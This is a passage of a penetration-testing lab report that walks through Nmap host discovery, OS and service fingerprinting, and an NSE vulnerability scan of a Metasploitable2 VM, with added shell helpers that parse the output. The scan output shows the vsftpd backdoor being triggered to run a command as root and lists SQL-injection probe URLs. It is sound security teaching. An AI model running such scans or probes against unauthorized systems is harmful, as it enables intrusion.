Vulnerability Assessment & Penetration Testing Report Metasploitable2




VAPT stands for Vulnerability Assessment and Penetration Testing. Vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructure, and giving the organization that commissioned the assessment the knowledge, awareness and risk context it needs to understand the threats to its environment and react appropriately.


Penetration testing (or pentesting) is a simulated cyber attack in which professional ethical hackers break into corporate networks to find weaknesses before real attackers do.

It is like the film Sneakers, where hacker-consultants are hired to break into a company's systems: the pentester uses the same tools and techniques available to malicious hackers, but with authorization and an agreed scope, and reports what was found so that it can be fixed.



Life Cycle of Penetration Testing:

1] Reconnaissance

2] Scanning

3] Exploitation

4] Maintaining Access



Reconnaissance


Reconnaissance is the information-gathering work done before any real attack is planned. On a real engagement recon is usually the longest phase and can take weeks or months. Here the target is already known: a Metasploitable2 virtual machine on the same network as the attacking machine. To locate it we start with an Nmap ping sweep of the local range (192.168.43.1-255) to list the hosts that are up:



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



The command above sweeps the whole 192.168.43.x range. Note that -sP is the old spelling of -sn, a ping sweep that only reports which hosts are up; it does not port-scan, and -sV only works on ports a port scan found open, so the version flag adds nothing here. The OS and service details come from the next scan. The sweep output was saved to livehosts.txt so that the live IP addresses can be pulled out of it with a short pipeline:

cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt

This keeps the "Nmap scan report for <IP>" lines and takes the fifth space-separated field, the address, writing one IP per line to ip.txt. One caveat: when Nmap resolves a reverse DNS name the line reads "Nmap scan report for name (IP)" and field 5 becomes the name rather than the address, so on networks with working reverse DNS add -n to the scan, or parse the greppable output (-oG) instead. The filtered result is below.



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat ip.txt
192.168.43.1
192.168.43.120
192.168.43.152
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
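The pipeline above is fine for this lab, but it breaks as soon as Nmap prints a hostname. The following script is an added example, not part of the original report, that extracts live IPs from both shapes of normal output and from the greppable (-oG) format. The function names are mine and both inputs are constructed samples modelled on Nmap 7.91 output, not captures from the report.

```sh
#!/bin/sh
# Added example, not part of the original report. Extracts live-host IPs from
# an nmap ping sweep in a way that survives reverse-DNS names. Function names
# (live_ips_normal, live_ips_grepable) are my own; both inputs are constructed
# samples modelled on nmap 7.91 output, not captures from the report.

# Normal output: a bare IP when no name resolves, "name (IP)" when one does,
# and (with -v) "[host down]" lines that must not be collected.
SAMPLE_NORMAL='Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:20 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Nmap scan report for 192.168.43.7 [host down]
Nmap scan report for metasploitable.localdomain (192.168.43.120)
Host is up (0.00071s latency).
Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.51 seconds'

# Greppable output (nmap -sn -oG - 192.168.43.0/24): one "Host:" line per
# address with the IP always in field 2, which is the form to script against.
SAMPLE_GREPABLE='# Nmap 7.91 scan initiated Fri Jul  9 23:20:01 2021 as: nmap -sn -oG - 192.168.43.0/24
Host: 192.168.43.1 ()   Status: Up
Host: 192.168.43.120 (metasploitable.localdomain)   Status: Up
Host: 192.168.43.152 ()   Status: Up
# Nmap done at Fri Jul  9 23:20:04 2021 -- 256 IP addresses (3 hosts up) scanned in 2.51 seconds'

# live_ips_normal: read normal output on stdin, print one IPv4 address per
# line. The first sed expression handles "name (IP)", the second a bare IP
# anchored at end of line so "[host down]" entries are skipped. The report's
# cut -d " " -f5 would print "metasploitable.localdomain" for the named host.
live_ips_normal() {
    sed -n \
        -e 's/^Nmap scan report for .*(\([0-9.][0-9.]*\)).*$/\1/p' \
        -e 's/^Nmap scan report for \([0-9.][0-9.]*\)$/\1/p'
}

# live_ips_grepable: same result from -oG output; only hosts marked Up.
live_ips_grepable() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Usage: replace the samples with "nmap -sn 192.168.43.0/24 | live_ips_normal"
# or "nmap -sn -oG - 192.168.43.0/24 | live_ips_grepable" to build ip.txt.
printf '%s\n' "$SAMPLE_NORMAL" | live_ips_normal
```

Both functions return the same three addresses for the samples; the named host and the down host are the two cases the original cut -f5 pipeline gets wrong.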


Next we need to work out which of the three live hosts is the Metasploitable2 machine, so we run a service-version and OS-detection scan against every address in ip.txt (-iL reads the targets from a file; -O needs raw packet access, hence sudo):



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt livehosts.txt osdetails.txt vapt-report.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



Our output is here :-)



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat osdetails.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login
514/tcp open shell?
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
SF:ulJaiswal\)\n");
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$




As you can see, the scan returns a lot of information: open ports, service names and versions, the TCP/IP fingerprint, hostnames, OS details, MAC addresses and network distance. Reading the three reports together identifies the target. 192.168.43.152 is 0 hops away and runs a current OpenSSH 8.4p1, so it is our own attacking machine. 192.168.43.1 exposes only dnsmasq on port 53, which is the hotspot/router handing out the addresses. 192.168.43.120 has 23 open ports, a VirtualBox MAC address, a Linux 2.6 kernel guess, the hostnames metasploitable.localdomain and irc.Metasploitable.LAN, and even a service labelled "Metasploitable root shell" on port 1524, so 192.168.43.120 is the Metasploitable2 target. The ancient service versions on it (vsftpd 2.3.4, OpenSSH 4.7p1, Apache 2.2.8, MySQL 5.0.51a, Samba 3.x, UnrealIRCd) are the first indication of how much attack surface it carries.
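Picking the target out by eye works for three hosts; on a bigger subnet it helps to reduce each host to one line. The script below is an added example, not part of the original report: an awk summary of Nmap's normal (-oN) output that counts open ports, pulls the OS guess, hop count and the hostnames from "Service Info", and tags the host whose names contain "metasploitable" as TARGET and the host 0 hops away as SELF. The function name is mine and the input is a constructed, shortened version of the osdetails.txt shown above.

```sh
#!/bin/sh
# Added example, not part of the original report: summarise "nmap -sV -O"
# normal output per host so the target stands out in a list of live hosts.
# host_summary is my own name; SAMPLE_OSDETAILS is a constructed, shortened
# copy of the report's osdetails.txt (same line shapes, fewer ports).
SAMPLE_OSDETAILS='Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop

Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
1524/tcp open bindshell Metasploitable root shell
6000/tcp open X11 (access denied)
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds'

# host_summary: read nmap normal output on stdin and print one line per host:
# IP, open TCP/UDP port count, hop count, OS guess, hostnames nmap saw, tag.
# TARGET = a hostname contains "metasploitable"; SELF = 0 hops (the scanner).
host_summary() {
    awk '
    function emit() {
        tag = ""
        if (tolower(hosts) ~ /metasploitable/) tag = "TARGET"
        else if (hops == "0") tag = "SELF"
        printf "%s\topen=%d\thops=%s\tos=%s\thosts=%s\t%s\n", ip, open, hops, os, hosts, tag
    }
    /^Nmap scan report for/ {
        if (ip != "") emit()
        ip = $NF; gsub(/[()]/, "", ip)      # "name (1.2.3.4)" -> "1.2.3.4"
        open = 0; hops = "?"; os = "unknown"; hosts = "-"
    }
    /^[0-9]+\/(tcp|udp) +open/ { open++ }
    /^OS details:/             { os = substr($0, 13) }
    /^Network Distance:/       { hops = $3 }
    /^Service Info:/ && match($0, /Hosts: [^;]*/) { hosts = substr($0, RSTART + 7, RLENGTH - 7) }
    END { if (ip != "") emit() }
    '
}

# Usage on real data: host_summary < osdetails.txt
printf '%s\n' "$SAMPLE_OSDETAILS" | host_summary
```

On the sample this prints three tab-separated lines: the gateway with one open port and no OS match, 192.168.43.120 with five open ports tagged TARGET, and 192.168.43.152 at 0 hops tagged SELF.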



Vulnerability Scanning


In this phase we scan the target for known vulnerabilities. We again use Nmap, this time running the NSE scripts in the vuln category against 192.168.43.120. -Pn skips host discovery and treats the address as up, which is what we want for a single target we already know is live. Two caveats: the vuln category is not purely passive, for example ftp-vsftpd-backdoor actually triggers the vsftpd 2.3.4 backdoor and runs id through it (see its "Exploit results" in the output below), so run it only against systems you are authorized to test, and use --script "vuln and safe" when only non-intrusive checks are acceptable. The http scripts also spider the site, which is why the scan takes longer and the output is so large.




┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
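The vuln.txt that this scan produces runs to several hundred lines, most of them spider output. The script below is an added helper, not part of the original report, that reduces NSE vuln output to one line per finding: port, script, State, IDs and the finding's title. The function name is mine and SAMPLE_VULN is a constructed, shortened copy of the report's own output with Nmap's usual indentation.

```sh
#!/bin/sh
# Added example, not part of the original report: turn "nmap --script vuln"
# output into one tab-separated line per finding for triage. vuln_findings is
# my own name; SAMPLE_VULN is a constructed, shortened copy of the report's
# vuln.txt. NSE prints each finding as a title line followed by "State:" and
# an optional "IDs:" line, which is what the parser keys on.
SAMPLE_VULN='Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|     References:
|_      https://weakdh.org
80/tcp open http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|_    Disclosure date: 2009-09-17'

# vuln_findings: read NSE output on stdin, print "port script state ids title"
# per finding. Script results without a State line (such as the NOT VULNERABLE
# one-liner above) are not findings and are dropped.
vuln_findings() {
    awk '
    function emit() {
        if (title != "") printf "%s\t%s\t%s\t%s\t%s\n", port, script, state, ids, title
        title = ""; state = ""; ids = ""
    }
    /^[0-9]+\/(tcp|udp) / { emit(); port = $1; script = "" }
    /^\|/ {
        line = $0
        sub(/^\|_? */, "", line)              # strip the NSE output margin
        if (line ~ /^[a-z0-9-]+: *$/) {       # "| script-name:" opens a script block
            emit(); script = line; sub(/: *$/, "", script); next
        }
        if (line ~ /^State: /) {              # one finding per State line; title precedes it
            emit(); state = line; sub(/^State: /, "", state); title = last; next
        }
        if (line ~ /^IDs: /) { ids = line; sub(/^IDs: +/, "", ids); next }
        if (line != "" && line !~ /^(VULNERABLE|Check results|References|Exploit results|Disclosure date):/) last = line
    }
    END { emit() }
    '
}

# Usage on real data: vuln_findings < vuln.txt | sort -t "$(printf '\t')" -k3
printf '%s\n' "$SAMPLE_VULN" | vuln_findings
```

For the sample this yields four findings: the vsftpd backdoor on 21/tcp, the anonymous-DH and Logjam findings on 25/tcp (the first has no IDs field, so that column is empty), and the Slowloris check on 80/tcp with state LIKELY VULNERABLE, which is the distinction a triage list needs to preserve.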


The output is here - 



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat vuln.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_sslv2-drown:
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
53/tcp open domain
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.43.120:80/dvwa/
| Form id:
| Form action: login.php
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/edit/TWiki/
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
| Form id: id-bad-cred-tr
| Form action: index.php?page=register.php
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
| Form id: iddnslookupform
| Form action: index.php?page=dns-lookup.php
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
| Form id: idpollform
|_ Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /tikiwiki/: Tikiwiki
| /test/: Test page
| /phpinfo.php: Possible information file
| /phpMyAdmin/: phpMyAdmin
| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
| /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
| /icons/: Potentially interesting folder w/ directory listing
|_ /index/: Potentially interesting folder
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
